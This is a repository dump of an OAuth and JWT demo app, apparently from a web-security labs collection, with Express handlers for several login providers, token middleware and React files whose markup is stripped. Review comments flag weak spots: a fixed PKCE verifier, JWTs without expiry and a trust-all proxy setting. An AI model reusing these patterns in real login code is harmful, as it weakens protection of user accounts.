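      url: `https://${OAUTH_SHOPIFY_STORE}.myshopify.com/admin/api/2020-04/shop.json`,
      method: 'get',
      headers: {
        'content-type': 'application/json',
        'X-Shopify-Access-Token': token.access_token,
      },
    })

    if (store && store.shop) {
      userProvider = {
        email: store.shop.email,
        name: store.shop.name,
      }
    }
  }

  return userProvider
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/spotify.js:
--------------------------------------------------------------------------------
// Imports
import axios from 'axios'

// App imports
import {
  OAUTH_SPOTIFY_ID,
  OAUTH_SPOTIFY_SECRET,
  URL_WEB,
} from 'setup/config/env'
import params from 'setup/config/params'

/**
 * Spotify OAuth 2.0 code exchange.
 *
 * @param {object} args
 * @param {string} args.code - authorization code received on the redirect URI
 * @returns {Promise<{email: string, name: string}|undefined>} provider profile,
 *   or undefined when no access_token or no profile id came back
 * @throws axios errors (non-2xx responses, network failures) propagate untouched
 */
export default async function spotify({ code }) {
  let userProvider

  // 1. exchange the authorization code for an access_token
  //    (client credentials as an HTTP Basic header; the rest as query params)
  const basic = Buffer.from(`${OAUTH_SPOTIFY_ID}:${OAUTH_SPOTIFY_SECRET}`).toString('base64')

  const { data: token } = await axios({
    url: 'https://accounts.spotify.com/api/token',
    method: 'post',
    headers: {
      Authorization: `Basic ${basic}`,
    },
    params: {
      redirect_uri: `${URL_WEB}/${params.user.oauth.redirectUri}`,
      grant_type: `authorization_code`,
      code,
    },
  })

  // 2. get user details
  if (token && token.access_token) {
    const { data: me } = await axios({
      url: 'https://api.spotify.com/v1/me',
      method: 'get',
      headers: {
        'content-type': 'application/json',
        Authorization: `Bearer ${token.access_token}`,
      },
    })

    if (me && me.id) {
      userProvider = {
        email: me.email,
        name: me.display_name,
      }
    }
  }

  return userProvider
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/twitter.js:
--------------------------------------------------------------------------------
// Imports
import axios from 'axios'

// App imports
import { OAUTH_TWITTER_ID, URL_WEB } from 'setup/config/env'
import params from 'setup/config/params'

/**
 * Twitter OAuth 2.0 (PKCE) code exchange.
 *
 * @param {object} args
 * @param {string} args.code - authorization code received on the redirect URI
 * @returns {Promise<{email: string, name: string}|undefined>} provider profile
 *   (with a synthesized email), or undefined when no access_token or no user
 *   object came back
 * @throws axios errors (non-2xx responses, network failures) propagate untouched
 */
export default async function twitter({ code }) {
  let userProvider

  // 1. exchange the authorization code for an access_token
  //    (PKCE flow: no client secret is sent)
  const form = new URLSearchParams()
  form.append('client_id', OAUTH_TWITTER_ID)
  form.append('redirect_uri', `${URL_WEB}/${params.user.oauth.redirectUri}`)
  form.append('grant_type', `authorization_code`)
  // NOTE(review): the PKCE verifier is the fixed string `code_challenge`,
  // which only works if the web client sent that same fixed value as its
  // challenge. A constant verifier gives PKCE no protection; the intended
  // design is a per-login random verifier generated by the client and
  // passed through to this call.
  form.append('code_verifier', `code_challenge`)
  form.append('code', code)

  const { data: token } = await axios({
    url: `https://api.twitter.com/2/oauth2/token`,
    method: 'post',
    data: form,
  })

  // 2. get user details
  if (token && token.access_token) {
    const { data: me } = await axios({
      url: 'https://api.twitter.com/2/users/me',
      method: 'get',
      headers: {
        'content-type': 'application/json',
        Authorization: `Bearer ${token.access_token}`,
      },
    })

    // the v2 API wraps the user object in `data`
    if (me && me.data) {
      userProvider = {
        // since twitter does not return email, we construct a dummy email for database
        // NOTE(review): if accounts are keyed on email (the consuming
        // authorize handler is not shown), make sure this synthesized
        // address cannot collide with one asserted by another provider.
        email: `${me.data.username}.${me.data.id}@example.com`,
        name: me.data.name,
      }
    }
  }

  return userProvider
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/authorize/zoom.js:
--------------------------------------------------------------------------------
// Imports
import axios from 'axios'

// App imports
import { OAUTH_ZOOM_ID, OAUTH_ZOOM_SECRET, URL_WEB } from 'setup/config/env'
import params from 'setup/config/params'

/**
 * Zoom OAuth 2.0 code exchange.
 *
 * @param {object} args
 * @param {string} args.code - authorization code received on the redirect URI
 * @returns {Promise<{email: string, name: string}|undefined>} provider profile,
 *   or undefined when no access_token or no profile id came back
 * @throws axios errors (non-2xx responses, network failures) propagate untouched
 */
export default async function zoom({ code }) {
  let userProvider

  // 1. exchange the authorization code for an access_token
  //    (client credentials as an HTTP Basic header; the rest as query params)
  const basic = Buffer.from(`${OAUTH_ZOOM_ID}:${OAUTH_ZOOM_SECRET}`).toString('base64')

  const { data: token } = await axios({
    url: 'https://zoom.us/oauth/token',
    method: 'post',
    headers: {
      Authorization: `Basic ${basic}`,
    },
    params: {
      redirect_uri: `${URL_WEB}/${params.user.oauth.redirectUri}`,
      grant_type: `authorization_code`,
      code,
    },
  })

  // 2. get user details
  if (token && token.access_token) {
    const { data: me } = await axios({
      url: 'https://api.zoom.us/v2/users/me',
      method: 'get',
      headers: {
        'content-type': 'application/json',
        Authorization: `Bearer ${token.access_token}`,
      },
    })

    if (me && me.id) {
      userProvider = {
        email: me.email,
        name: `${me.first_name} ${me.last_name}`,
      }
    }
  }

  return userProvider
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/mutation/index.js:
--------------------------------------------------------------------------------
// App Imports
import userAuthorize from './authorize'

// Mutations exposed by the user module. userAuthorize presumably dispatches
// to the provider handlers above; its implementation is not shown here.
const mutations = {
  userAuthorize,
}

export default mutations
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/query/authResponse.js:
--------------------------------------------------------------------------------
// Imports
import jwt from 'jsonwebtoken'

// App Imports
import { SECURITY_SECRET } from 'setup/config/env'

/**
 * Auth Response (token and user info): a signed JWT plus the user record
 * without its password field.
 *
 * @param {object} user - mongoose User document
 * @returns {{token: string, user: object}}
 */
export default function userAuthResponse(user) {
  const safeUser = user.toJSON()

  // never hand the stored password (whatever it holds) to the client
  delete safeUser.password

  // The token carries only the user id; the authentication middleware
  // resolves it back to a User on every request. The algorithm is pinned so
  // the signing side states HS256 (the library default for a string secret)
  // explicitly and the verifying side can pin the same value.
  // NOTE(review): no `expiresIn` is set, so a token stays valid until
  // SECURITY_SECRET is rotated; consider an expiry plus a refresh path.
  const token = jwt.sign({ id: safeUser._id }, SECURITY_SECRET, {
    algorithm: 'HS256',
  })

  return {
    token,
    user: safeUser,
  }
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/query/index.js:
--------------------------------------------------------------------------------
// App imports
import userProfile from './profile'

// Queries exposed by the user module
const queries = {
  userProfile,
}

export default queries
--------------------------------------------------------------------------------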
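/oauth-authentication/learn-json-web-tokens-master/api/src/modules/user/query/profile.js:
--------------------------------------------------------------------------------
// App imports
import { authCheck } from 'setup/helpers/utils'
import { AuthError } from 'modules/common/errors'
import User from 'modules/user/model'

/**
 * Profile query: return the caller's own user record.
 *
 * @param {object} args
 * @param {object} args.auth - auth context populated by the authentication middleware
 * @returns {Promise<{data: object|null}>} the user document without its password field
 * @throws {AuthError} when the caller is not authenticated
 * @throws {Error} when the lookup fails
 */
export default async function profile({ auth }) {
  // The debug `console.log('auth', auth)` that sat here printed the whole
  // auth context, i.e. the loaded User document, on every call; removed.
  if (!authCheck(auth)) {
    throw new AuthError('You are not authorized to perform this action.')
  }

  try {
    // User: keyed on the verified auth context, and the password field is
    // projected out so the profile response carries no credential material
    // (userAuthResponse strips the same field from the login response).
    const data = await User.findOne({ _id: auth.user._id }).select('-password')

    return {
      data,
    }
  } catch (error) {
    throw new Error(`An error occurred. ${error.message}`)
  }
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/setup/config/params.js:
--------------------------------------------------------------------------------
// Params
// Static, non-secret configuration; secrets and URLs live in setup/config/env.
export default {
  site: {
    name: 'OAuth',
    description: 'OAuth 2.0 examples for various providers in one place',
    author: 'Atul Yadav',
    url: 'https://github.com/atulmy/oauth',
    copyright: '© 2020',
  },

  // common
  common: {
    endpoint: {
      // single dispatch route; the operation name is an optional path segment
      url: '/:operation?',
      upload: '/upload',
    },

    // codes attached to AuthError / ValidationError (modules/common/errors)
    errors: {
      auth: 'error_auth',
      validation: 'error_validation',
    },
  },

  // user
  user: {
    oauth: {
      // key -> display title for each supported provider; presumably `key`
      // selects the matching handler under user/mutation/authorize
      providers: {
        facebook: {
          key: 'facebook',
          title: 'Facebook',
        },

        google: {
          key: 'google',
          title: 'Google',
        },

        instagram: {
          key: 'instagram',
          title: 'Instagram',
        },

        linkedin: {
          key: 'linkedin',
          title: 'LinkedIn',
        },

        twitter: {
          key: 'twitter',
          title: 'Twitter',
        },

        reddit: {
          key: 'reddit',
          title: 'Reddit',
        },

        discord: {
          key: 'discord',
          title: 'Discord',
        },

        zoom: {
          key: 'zoom',
          title: 'Zoom',
        },

        github: {
          key: 'github',
          title: 'Github',
        },

        gitlab: {
          key: 'gitlab',
          title: 'Gitlab',
        },

        digitalocean: {
          key: 'digitalocean',
          title: 'DigitalOcean',
        },

        bitbucket: {
          key: 'bitbucket',
          title: 'Bitbucket',
        },

        azure: {
          key: 'azure',
          title: 'Azure',
        },

        spotify: {
          key: 'spotify',
          title: 'Spotify',
        },

        shopify: {
          key: 'shopify',
          title: 'Shopify',
        },
      },

      // path segment the provider handlers append to URL_WEB to build the
      // redirect_uri sent with the code exchange
      redirectUri: 'authorize/',
    },
  },
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/setup/helpers/utils.js:
--------------------------------------------------------------------------------
// App Imports
import { ENV } from 'setup/config/env'

// Utility functions

// Check development env
export function isDevelopment() {
  return ENV === 'development'
}

// Generate random number in [low, high).
// Built on Math.random, so suitable for non-security uses only — not for
// tokens, secrets or anything that must be unguessable.
export function randomNumber(low, high) {
  return Math.floor(Math.random() * (high - low) + low)
}

// Auth check user: truthy when the authentication middleware attached a user
// with an _id. Returns the _id value itself (or the falsy short-circuit
// value), not a boolean; callers use it in boolean context.
export function authCheck(auth) {
  return auth && auth.user && auth.user._id
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/setup/helpers/validation.js:
--------------------------------------------------------------------------------
// Imports
import Validator from 'fullstack-validator'

// Shared validator instance used by the mutations (no custom rules registered)
const v = new Validator(/* custom rules */)

export default v
--------------------------------------------------------------------------------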
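/oauth-authentication/learn-json-web-tokens-master/api/src/setup/server/authentication.js:
--------------------------------------------------------------------------------
// Imports
import jwt from 'jsonwebtoken'

// App Imports
import { SECURITY_SECRET } from 'setup/config/env'
import User from 'modules/user/model'

// Signature algorithms accepted from clients. SECURITY_SECRET is a shared
// string, so only the HMAC family applies; naming the set here makes it
// explicit instead of relying on the library default for string secrets.
const ACCEPTED_ALGORITHMS = ['HS256', 'HS384', 'HS512']

// Authentication middleware
//
// Reads the `authentication` request header, expected as "<scheme> <token>",
// verifies the token against SECURITY_SECRET and loads the user it names.
// On success `request.auth` is `{ isAuthenticated: true, user }`; in every
// other case (no header, malformed header, invalid or expired token, unknown
// user) it is `{ isAuthenticated: false, user: null }`, so downstream
// handlers always find a value. Never throws; always calls `next()`.
export default async function (request, response, next) {
  // Default to unauthenticated so a rejected token does not leave
  // `request.auth` undefined for the operation handlers.
  request.auth = {
    isAuthenticated: false,
    user: null,
  }

  const header = request.headers.authentication

  if (header) {
    try {
      // Second space-separated part is the token; the scheme word is not checked
      const token = header.split(' ')[1]

      if (token) {
        const userToken = jwt.verify(token, SECURITY_SECRET, {
          algorithms: ACCEPTED_ALGORITHMS,
        })
        const user = await User.findOne({ _id: userToken.id })

        if (user) {
          request.auth = {
            isAuthenticated: true,
            user,
          }
        }
      }
    } catch (e) {
      // The token value itself is intentionally kept out of the logs
      console.warn('Invalid token detected.')
    }
  }

  next()
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/setup/server/database.js:
--------------------------------------------------------------------------------
// Imports
import mongoose from 'mongoose'

// App Imports
import { ENV, DATABASE_URL } from 'setup/config/env'

// Connect database
export async function connect() {
  console.info('SETUP - Connecting database..')

  await connectWithRetry()
}

// Disconnect database
export async function close() {
  console.info('INFO - Disconnecting database..')

  return await mongoose.connection.close()
}

// Drop database
//
// Destructive; guarded so it is a no-op outside the development environment.
export async function drop() {
  if (ENV === 'development') {
    console.info('INFO - Dropping database..')

    return await mongoose.connection.dropDatabase()
  }
}

// Handle connection error
//
// Logs the failure and schedules another connection attempt 5 s later.
mongoose.connection.on('error', (error) => {
  console.log(`ERROR - Connection failed: ${error.message}`)

  setTimeout(async () => {
    console.log('SETUP - Connecting database.. retrying..')

    await connectWithRetry()
  }, 5000)
})

// Retry connection
const connectWithRetry = async () => {
  return await mongoose.connect(DATABASE_URL)
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/setup/server/endpoint.js:
--------------------------------------------------------------------------------
// App Imports
import { ENV } from 'setup/config/env'
import params from 'setup/config/params'
import authentication from 'setup/server/authentication'
import modules from './modules'

// Setup endpoint
//
// Mounts the single RPC-style route. Any HTTP method is accepted
// (`server.all`); the operation name comes from the JSON body or the URL
// parameter, and its arguments from `body.params` (falling back to the
// query string), `body.fields` and the auth context set by the
// authentication middleware. Mutations are therefore reachable with GET;
// this is tolerable only because credentials travel in a request header,
// never in a cookie a browser would attach on its own.
export default function (server) {
  console.info('SETUP - Endpoint..')

  // API endpoint
  server.all(
    params.common.endpoint.url,
    [authentication],
    async (request, response) => {
      const result = {
        success: false,
        message: 'Please try again.',
        code: 'default',
        data: null,
      }

      // Resolve the operation: body first, then the URL parameter (as before).
      // Only own properties of the module map count — a bare `modules[name]`
      // lookup would also resolve inherited Object.prototype members such as
      // "constructor" or "toString".
      const operationName = [
        request.body.operation,
        request.params.operation,
      ].find((name) => Object.prototype.hasOwnProperty.call(modules, name))
      const operation = operationName ? modules[operationName] : undefined

      if (operation) {
        try {
          // Execute operation
          // operationName({ params, fields, auth })
          const {
            data,
            message = 'Success.',
            success = true,
          } = await operation({
            params: request.body.params || request.query || {},
            fields: request.body.fields || {},
            auth: request.auth,
          })

          // Operation executed successfully
          result.success = success
          result.data = data
          result.message = message
        } catch (error) {
          // The error text is sent to the client verbatim. Operations that
          // throw the app's auth/validation errors intend that; any other
          // error an operation lets through should carry a generic message.
          result.message = error.message
          result.code = error.code || 'default'
        }
      } else {
        // Echo the name that was actually requested (the URL parameter when
        // the body carried none) rather than always `body.operation`.
        const requested = request.body.operation || request.params.operation
        result.message = `${requested} operation is not available.`
      }

      // Log info in development mode
      // (the whole body is printed, including any user-submitted secrets)
      if (ENV === 'development') {
        console.log(request.body)
        console.log(result.success, result.message)
      }

      // Send response
      response.send(result)
    },
  )
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/setup/server/middlewares.js:
--------------------------------------------------------------------------------
// Imports
import path from 'path'
import express from 'express'
import cors from 'cors'
import bodyParser from 'body-parser'
import morgan from 'morgan'

// App Imports
import { ENV, URL_WEB } from 'setup/config/env'

// Setup middlewares
//
// Registers CORS (restricted to the web app origin), JSON and
// form-urlencoded body parsing, the static `public` folder and, in
// development only, HTTP request logging.
export default function (server) {
  console.info('SETUP - Middlewares..')

  // Enable CORS — only the configured web origin is allowed
  server.use(
    cors({
      origin: [URL_WEB],
    }),
  )

  // Request body parser (library default size limits apply)
  server.use(bodyParser.json())
  server.use(bodyParser.urlencoded({ extended: false }))

  // Static files folder
  server.use(express.static(path.join(__dirname, '..', '..', '..', 'public')))

  // HTTP logger
  if (ENV === 'development') {
    server.use(morgan('tiny'))
  }
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/setup/server/modules.js:
--------------------------------------------------------------------------------
// App Imports
import user from 'modules/user'
import note from 'modules/note'

// Modules
//
// Flat map of operation name -> handler used by the endpoint; a name
// defined in both modules resolves to the later spread (`note`).
export default {
  ...user,
  ...note,
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/api/src/setup/server/start.js:
--------------------------------------------------------------------------------
// Imports
import ip from 'ip'
import mongoose from 'mongoose'

// App imports
import { PORT, ENV } from 'setup/config/env'

// Start server
//
// Binds the HTTP server on PORT and installs SIGINT/SIGTERM handlers that
// close the listener, then the database connection, then exit.
export default async function (server) {
  console.info('SETUP - Starting server..')

  // `true` trusts X-Forwarded-* headers from any peer, so request.ip is
  // client-controlled unless a proxy in front overwrites them; when deployed
  // behind a known proxy, pass that proxy's address(es) here instead.
  server.set('trust proxy', true)

  const serverProcess = server.listen(PORT, async (error) => {
    if (error) {
      console.error('ERROR - Unable to start server.')
    } else {
      console.info(`INFO - Server started on`)
      console.info(` Local http://localhost:${PORT} [${ENV}]`)
      console.info(` Network http://${ip.address()}:${PORT} [${ENV}]`)
      console.info(` Datetime ${new Date()}\n`)
    }
  })

  // Socket inactivity timeout in milliseconds
  serverProcess.setTimeout(500000)

  // Stop Server
  for (let signal of ['SIGINT', 'SIGTERM']) {
    process.on(signal, async () => {
      console.info('INFO - Shutting down server..')

      serverProcess.close(async () => {
        console.info('INFO - Server has been shut down.')

        mongoose.connection.close(false, async () => {
          console.info('INFO - Database disconnected.')
          process.exit(0)
        })
      })
    })
  }
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/web/jsconfig.json:
--------------------------------------------------------------------------------
{
  "compilerOptions": {
    "baseUrl": "src"
  },
  "include": ["src"]
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/web/package.json:
--------------------------------------------------------------------------------
{
  "name": "web",
  "version": "0.1.0",
  "private": true,
  "dependencies": {
    "@testing-library/jest-dom": "^5.16.4",
    "@testing-library/react": "^12.1.3",
    "@testing-library/user-event": "^13.5.0",
    "axios": "^0.27.2",
    "lodash": "^4.17.21",
    "moment": "^2.29.3",
    "query-string": "^7.1.1",
    "react": "^17.0.2",
    "react-dom": "^17.0.2",
    "react-helmet": "^6.1.0",
    "react-redux": "^7.2.6",
    "react-router-dom": "^5.2.0",
    "react-scripts": "5.0.1",
    "redux": "^4.2.0",
    "redux-thunk": "^2.4.1"
  },
  "devDependencies": {
    "husky": "^4.3.6",
    "prettier": "2.6.2",
    "pretty-quick": "^3.1.3"
  },
  "scripts": {
    "start": "react-scripts start",
    "build": "react-scripts build",
    "test": "react-scripts test",
    "eject": "react-scripts eject"
  },
  "husky": {
    "hooks": {
      "pre-commit": "pretty-quick --staged"
    }
  },
  "eslintConfig": {
    "extends": "react-app"
  },
  "browserslist": {
    "production": [
      ">0.2%",
      "not dead",
      "not op_mini all"
    ],
    "development": [
      "last 1 chrome version",
      "last 1 firefox version",
      "last 1 safari version"
    ]
  }
}
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/web/public/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/oauth-authentication/learn-json-web-tokens-master/web/public/favicon.ico
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/web/public/images/loader.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/oauth-authentication/learn-json-web-tokens-master/web/public/images/loader.gif
--------------------------------------------------------------------------------
/oauth-authentication/learn-json-web-tokens-master/web/public/images/other/shopify.svg: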
-------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/other/spotify.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/preview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/oauth-authentication/learn-json-web-tokens-master/web/public/images/preview.png -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/social/discord.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/social/facebook.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/social/google.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/social/linkedin.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/social/reddit.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/social/twitter.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 6 | 7 | 8 | 9 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/tech/azure.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/tech/bitbucket.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/tech/digitalocean.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/tech/github.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/images/tech/gitlab.svg: 
-------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 12 | 13 | 17 | 18 | 27 | OAuth 28 | 29 | 30 | 31 |
32 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/logo192.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/oauth-authentication/learn-json-web-tokens-master/web/public/logo192.png -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/logo512.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/oauth-authentication/learn-json-web-tokens-master/web/public/logo512.png -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "short_name": "React App", 3 | "name": "Create React App Sample", 4 | "icons": [ 5 | { 6 | "src": "favicon.ico", 7 | "sizes": "64x64 32x32 24x24 16x16", 8 | "type": "image/x-icon" 9 | }, 10 | { 11 | "src": "logo192.png", 12 | "type": "image/png", 13 | "sizes": "192x192" 14 | }, 15 | { 16 | "src": "logo512.png", 17 | "type": "image/png", 18 | "sizes": "512x512" 19 | } 20 | ], 21 | "start_url": ".", 22 | "display": "standalone", 23 | "theme_color": "#000000", 24 | "background_color": "#ffffff" 25 | } 26 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/public/robots.txt: -------------------------------------------------------------------------------- 1 | # https://www.robotstxt.org/robotstxt.html 2 | User-agent: * 3 | Disallow: 4 | 
-------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import React from 'react' 3 | import ReactDOM from 'react-dom' 4 | import { Provider as StateProvider } from 'react-redux' 5 | import { BrowserRouter as Router, Route, Switch } from 'react-router-dom' 6 | 7 | // UI imports 8 | import 'ui/common/colors.css' 9 | import 'ui/common/reset.css' 10 | 11 | // App imports 12 | import { store } from 'setup/store' 13 | import routes from 'setup/routes' 14 | import Layout from 'modules/common/Layout' 15 | import RoutePrivate from 'modules/common/RoutePrivate' 16 | import { 17 | loginSetUserLocalStorage, 18 | loginSetUser, 19 | } from 'modules/user/api/actions/query' 20 | import * as serviceWorker from './serviceWorker' 21 | 22 | // User Authentication 23 | const token = window.localStorage.getItem('token') 24 | if (token && token !== 'undefined' && token !== '') { 25 | const user = JSON.parse(window.localStorage.getItem('user')) 26 | if (user) { 27 | loginSetUserLocalStorage(token, user) 28 | store.dispatch(loginSetUser(token, user)) 29 | } 30 | } 31 | 32 | ReactDOM.render( 33 | 34 | 35 | 36 | 37 | {Object.values(routes).map((route, index) => 38 | route.auth ? 
( 39 | 40 | ) : ( 41 | 42 | ), 43 | )} 44 | 45 | 46 | 47 | , 48 | document.getElementById('root'), 49 | ) 50 | 51 | serviceWorker.unregister() 52 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/common/AuthCheck/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import React from 'react' 3 | import { Redirect } from 'react-router-dom' 4 | import { useSelector } from 'react-redux' 5 | 6 | // App Imports 7 | import routes from 'setup/routes' 8 | 9 | // Component 10 | const AuthCheck = () => { 11 | const { isAuthenticated } = useSelector((state) => state.auth) 12 | 13 | return isAuthenticated ? : '' 14 | } 15 | 16 | export default AuthCheck 17 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/common/Footer/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import React from 'react' 3 | 4 | // UI imports 5 | import './style.css' 6 | 7 | // App imports 8 | import params from 'setup/config/params' 9 | 10 | // Component 11 | const Footer = () => { 12 | // render 13 | return ( 14 | 20 | ) 21 | } 22 | 23 | export default Footer 24 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/common/Footer/style.css: -------------------------------------------------------------------------------- 1 | .common-footer { 2 | display: flex; 3 | flex-direction: row; 4 | border-top: 1px solid #cccccc; 5 | padding: 1.5rem 2rem; 6 | } 7 | .common-footer > a { 8 | margin-left: 0.5rem; 9 | } 10 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/common/Header/index.js: 
-------------------------------------------------------------------------------- 1 | // Imports 2 | import React from 'react' 3 | import { Link, NavLink } from 'react-router-dom' 4 | import { useSelector } from 'react-redux' 5 | 6 | // UI imports 7 | import './style.css' 8 | 9 | // App imports 10 | import params from 'setup/config/params' 11 | import routes from 'setup/routes' 12 | 13 | // Component 14 | const Header = () => { 15 | // state 16 | const { user } = useSelector((state) => state.auth) 17 | 18 | // render 19 | return ( 20 |
21 | 27 | 28 | 43 |
44 | ) 45 | } 46 | 47 | export default Header 48 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/common/Header/style.css: -------------------------------------------------------------------------------- 1 | .common-header { 2 | display: flex; 3 | flex-direction: column; 4 | } 5 | .common-header > .brand { 6 | display: flex; 7 | flex-direction: column; 8 | border-bottom: 1px solid #cccccc; 9 | padding: 1.5rem 2rem; 10 | } 11 | 12 | .common-header > .brand > h5 { 13 | margin-top: 0.5rem; 14 | color: #666666; 15 | } 16 | 17 | .common-header > .menu { 18 | display: flex; 19 | flex-direction: row; 20 | border-bottom: 1px solid #cccccc; 21 | padding: 0 1rem; 22 | } 23 | 24 | .common-header > .menu > a { 25 | text-transform: uppercase; 26 | font-weight: bold; 27 | padding: 0.5rem 1rem; 28 | } 29 | .common-header > .menu > a.active { 30 | color: var(--primary); 31 | } 32 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/common/Layout/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import React from 'react' 3 | 4 | // UI imports 5 | import './style.css' 6 | 7 | // App imports 8 | import Header from 'modules/common/Header' 9 | import Footer from 'modules/common/Footer' 10 | 11 | // Component 12 | const Layout = ({ children }) => { 13 | // render 14 | return ( 15 |
16 | {/* header */} 17 |
18 | 19 | {/* content */} 20 |
{children}
21 | 22 | {/* footer */} 23 |
24 |
25 | ) 26 | } 27 | 28 | export default Layout 29 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/common/Layout/style.css: -------------------------------------------------------------------------------- 1 | .common-layout { 2 | display: flex; 3 | flex-direction: column; 4 | flex: 1; 5 | } 6 | 7 | .common-layout > main { 8 | display: flex; 9 | flex-direction: column; 10 | flex: 1; 11 | padding: 1.5rem 2rem; 12 | } 13 | -------------------------------------------------------------------------------- /oauth-authentication/learn-json-web-tokens-master/web/src/modules/common/RoutePrivate/index.js: -------------------------------------------------------------------------------- 1 | // Imports 2 | import React from 'react' 3 | import { Route, Redirect } from 'react-router-dom' 4 | import { useSelector } from 'react-redux' 5 | 6 | // App imports 7 | import routes from 'setup/routes' 8 | 9 | // Component 10 | const RoutePrivate = ({ role, component, ...props }) => { 11 | const { isAuthenticated } = useSelector((state) => state.auth) 12 | 13 | return isAuthenticated ? 
